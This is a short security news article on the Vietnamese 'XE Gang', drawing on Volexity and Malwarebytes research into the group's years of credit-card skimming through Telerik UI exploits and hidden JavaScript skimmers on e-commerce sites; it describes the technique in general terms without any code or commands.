Last Updated on 09/12/2021 by Nidhi Khandelwal
The ‘XE Gang,’ a relatively unknown group of Vietnamese hackers, has been tied to eight years of commercial hacking and credit card skimming.
Threat actors are suspected of stealing thousands of credit cards per day, primarily from restaurants, non-profit organizations, art galleries, and travel websites.
The actors hack externally-facing services using publicly accessible exploits, most notably Telerik UI weaknesses, to install password and payment information stealing malware.
The group’s operations were first detailed in a 2020 Malwarebytes report, but Volexity provided a more in-depth study of recent compromises ascribed to them yesterday.
More information becomes available.
Volexity was able to trace the XE Group’s infrastructure over the past three years and publish all technical information and IOCs on GitHub.
Thanks to a popular technique for loading malicious JavaScript snippets, the researchers were able to locate a large number of compromised sites all carrying the same skimmer.
“The code used to load the malicious JavaScript from this page exposes an unusual technique: the attacker uses the JavaScript keyword “object” to populate the domain value,” the researchers wrote in their Volexity study.
These are known as “Magecart” attacks, which occur when a threat actor hacks an eCommerce site and inserts malicious JavaScript that captures customer and payment information as it is submitted. The stolen data is subsequently sent to a remote site, where the attackers can collect it.
The long-term success of these attacks is determined by how effectively they can remain undetected on a website by security software.
When this skimmer’s sample is uploaded to VirusTotal, it receives a flawless 0/57 detection score, indicating that this group’s JavaScript is extremely resistant to AV detection.